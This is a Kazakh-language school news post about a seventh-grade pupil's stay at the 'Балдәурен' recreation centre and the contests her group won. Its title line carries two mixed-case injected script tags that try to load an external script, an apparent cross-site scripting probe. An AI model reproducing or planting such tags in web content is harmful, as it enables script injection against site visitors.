Балдәуренде өткізген қызықты сәттерім...<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
06.02.2020
Биылғы жылдың 6-25 қаңтар күндері мектебіміздің 7 сынып оқушысы Кайнеденова Назира Канатқызы республикалық «Балдәурен» оқу-сауықтыру орталығында демалып келген болатын. Осы оқушының қызықтыра айтқан әңгімелері сыныпқа өте жақсы әсер қалдырды. Назира мектебіміздің белсенді, екпінді оқушыларының бірі. Назира «Балдәурен» оқу-сауықтыру орталығында өткізілген іс-шаралар мен сайыстарды қызықтыра айтып берді.
Бірінші күннен маған өте жақсы әсерлі болды - деп сөзін Назира жалғастырды. Назираның айтуы бойынша бірінші күндері «Балдәурен» оқу-сауықтыру орталығы қай жерде орналасқаны жайлы саяхат жасалып, таныстырылды. Келесі күні оқушылармен топтардың визиткасы, яғни таныстырылым презентациясы өткізілді. Назира өзінің тобының аты «Камета» деп аталғаны жөнінде атап өтті. Әр топ өз ұрандары мен әндерін шырқап көңіл көтерді. Сонымен қатар «Балдәурен» оқу-сауықтыру орталығында спорттық жарыстар тоғызқұмалақ, баскетбол, пионербол ойындары өткізіліп командалық жарыста 1 орын алған. «Логика қайда» интеллектуалды ойын сайысынан 2 орын, «Ұлттар» күні сайысы өткізілген бұл күні әр топ бір елдің мәдениетін, тілін, әндерін, билерін орындаған 3 орын алған. «Дәлме-дәл» сайысында әр елдің әншілерінің пародиясын салып әр топ арасында жарысып 1 орын алды. Соңғы күндері Бурабайға саяхат жасады. Оқжетпеске, Жұмбақтасқа барып оның тарихымен таныстырылды.
Республикалық «Балдәурен» оқу-сауықтыру орталығынан алған әсерімен бөліскен Назирадай оқушымызға алғысымыз шексіз. Оқушыларымыз жеткен жетістіктерге мақтанышпен айту қандай жақсы. Алдағы уақытта Назира биіктен көрінуіне тілектеспіз.
Есенгулова Т.С.